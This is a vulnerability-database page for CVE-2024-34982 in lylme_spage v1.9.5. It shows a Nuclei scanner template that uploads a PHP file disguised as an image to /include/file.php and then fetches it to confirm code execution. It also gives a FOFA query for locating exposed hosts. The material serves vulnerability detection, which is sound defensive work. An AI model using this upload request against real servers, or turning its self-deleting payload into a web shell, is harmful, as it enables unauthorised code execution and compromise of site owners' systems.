Lucene search

ProjectDiscoveryNUCLEI:CVE-2024-34982

HistoryJun 18, 2024 - 7:04 a.m.

LyLme-Spage - Arbitary File Upload

2024-06-1807:04:32

ProjectDiscovery

github.com

lylme-spage

arbitrary file upload

cve2024

rce

www

file upload vulnerability

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.7

Confidence

High

JSON

An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.

id: CVE-2024-34982

info:
  name: LyLme-Spage - Arbitary File Upload
  author: DhiyaneshDk
  severity: high
  description: |
    An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.
  reference:
    - https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md
    - https://github.com/tanjiti/sec_profile
    - https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="-282504889"
  tags: cve,cve2024,lylme-spage,rce,intrusive

flow: http(1) && http(2)

variables:
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /include/file.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------575673989461736

        -----------------------------575673989461736
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: image/png

        <?php echo "{{string}}";unlink(__FILE__);?>
        -----------------------------575673989461736--

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"code":'
          - '"msg":'
          - 'php"}'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: path
        part: body
        group: 1
        regex:
          - '"url":"([/a-z_0-9.]+)"'
        internal: true

  - raw:
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{{string}}" )'
          - 'contains(header, "text/html")'
        condition: and
# digest: 4a0a004730450220440784f1e1d309bfb1eee99fbcaf02afe7bfa185b48f07233df0f14cac9e9d9b0221009072b53098bb58d0d3efd14db1a3fc5f7b0b4593a0426fa060db0c42edd6f029:922c64590222798bb761d5b6d8e72950

References

github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py

github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md

github.com/tanjiti/sec_profile

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.7

Confidence

High

JSON

Related for NUCLEI:CVE-2024-34982